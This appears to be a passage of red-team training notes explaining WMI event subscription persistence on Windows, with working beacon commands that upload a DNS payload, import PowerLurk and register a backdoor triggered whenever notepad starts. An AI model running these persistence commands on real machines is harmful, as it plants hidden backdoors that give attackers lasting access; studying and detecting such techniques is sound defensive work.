WMI Event Subscriptions

Persistence via WMI events can be achieved by leveraging the following three classes:

• EventConsumer

• EventFilter

• FilterToConsumerBinding

\

An EventConsumer is the action that we want to perform - in this case, to execute a payload. This can be via OS commands (such as a PowerShell one-liner) or VBScript. An EventFilter is a trigger that we can act upon. Any arbitrary WMI query can be used as a filter which provides practically unlimited options. These can include when a particular process starts, when a user logs in, when a USB device is inserted, any specific time of day or on a timed interval. The FilterToConsumerBinding simply links an EventConsumer and EventFilter together.

\

PowerLurk is a PowerShell tool for building these WMI events. In this example, I will upload a DNS payload into the Windows directory, import PowerLurk.ps1 and create a new WMI event subscription that will execute it whenever notepad is started.

beacon> cd C:\Windows
beacon> upload C:\Payloads\dns_x64.exe
beacon> powershell-import C:\Tools\PowerLurk.ps1
beacon> powershell Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

\

You can view these classes afterwards using Get-WmiEvent -Name WmiBackdoor. The CommandLineTemplate for the EventConsumer will simply be C:\Windows\dns_x64.exe; and query for the EventFilter will be SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'.

Open notepad on Workstation 2 and the DNS Beacon will appear.

\

\

The backdoor can be removed with Get-WmiEvent -Name WmiBackdoor | Remove-WmiObject.